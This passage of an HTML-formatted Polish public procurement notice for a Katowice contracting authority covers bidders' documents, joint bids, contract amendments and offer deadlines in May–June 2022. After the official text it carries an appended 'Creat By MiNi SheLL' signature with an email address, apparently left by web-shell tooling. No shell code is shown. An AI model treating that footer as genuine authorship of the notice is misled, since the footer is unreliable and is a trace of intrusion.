niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, wg wzoru stanowiącego załącznik nr 5 do SWZ.<br/>Wymagana forma i moment złożenia: oryginał w formie elektronicznej, w postaci elektronicznej z podpisem zaufanym lub osobistym albo kopia w postaci cyfrowego odwzorowania dokumentu papierowego, poświadczona za zgodność z oryginałem przez wykonawcę podpisem kwalifikowanym, zaufanym lub osobistym lub przez notariusza podpisem kwalifikowanym. Dokument składany na wezwanie Zamawiającego.<br/>3)	Wykazu usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami o których mowa są:<br/>-	referencje,<br/>-	inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, <br/>a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane,<br/>-	a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy;<br/>Wymagana forma i moment złożenia: oryginał w formie elektronicznej, w postaci elektronicznej z podpisem zaufanym lub osobistym albo kopia w postaci cyfrowego odwzorowania dokumentu papierowego, poświadczona za zgodność z oryginałem przez wykonawcę podpisem kwalifikowanym, zaufanym lub osobistym lub przez notariusza podpisem kwalifikowanym. Dokument składany na wezwanie Zamawiającego. Wzór wykazu usług stanowi załącznik 4 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2)	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, a także podmiotów udostępniających swoje zasoby wykonawcy, spełnienie wymogu dotyczącego braku podstaw do wykluczenia, powinno zostać wykazane przez każdy z tych podmiotów. Zamawiający nie będzie weryfikował, czy zachodzą podstawy do wykluczenia z postępowania dotyczące podwykonawców niebędących podmiotami udostępniającymi zasoby na zasadach określonych w art. 118 ustawy Pzp.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga, aby czynności do wykonywania których niezbędne jest posiadanie koncesji, wykonywał ten wykonawca, który posiada koncesję.<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy – zgodnie z załącznikiem nr 7 do SWZ.<br/>W przypadku wykonawców wspólnie ubiegających się o zamówienie (np. konsorcja, spółki<br/>cywilne) – winni oni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana treści Umowy może nastąpić wyłącznie w granicach unormowania art. 144 ust. 1 ustawy Prawo zamówień publicznych i pod rygorem nieważności wymaga formy pisemnego aneksu skutecznego po podpisaniu przez obie Strony. <br/>2.	Zamawiający może wyrazić zgodę na dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, wyłącznie w sytuacji:<br/>1)	ustawowej zmiany stawek podatkowych (VAT) w okresie obowiązywania Umowy, przy czym wartość Umowy, o której mowa w §7 ust. 1 Umowy nie ulegnie zwiększeniu,<br/>2)	zmiany powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ<br/>na realizację zamówienia, <br/>3)	ewentualnej zmiany sposobu realizacji zamówienia z samodzielnej realizacji przez Wykonawcę na realizację z udziałem podwykonawców, zmiany zakresu czynności powierzonych podwykonawcom. W przypadku, gdy dotychczasowy podwykonawca swoimi zasobami potwierdzał spełnienie przez Wykonawcę warunków udziału w postępowaniu, nowy podwykonawca musi spełniać warunki udziału w postępowaniu w takim samym zakresie jak dotychczasowy podwykonawca tj. pozwalające spełnić warunki udziału w postępowaniu określone przez Zamawiającego w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP (adres skrzynki ePUAP Zamawiającego: KatowiceMiastoOgrodow/SkrytkaESP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com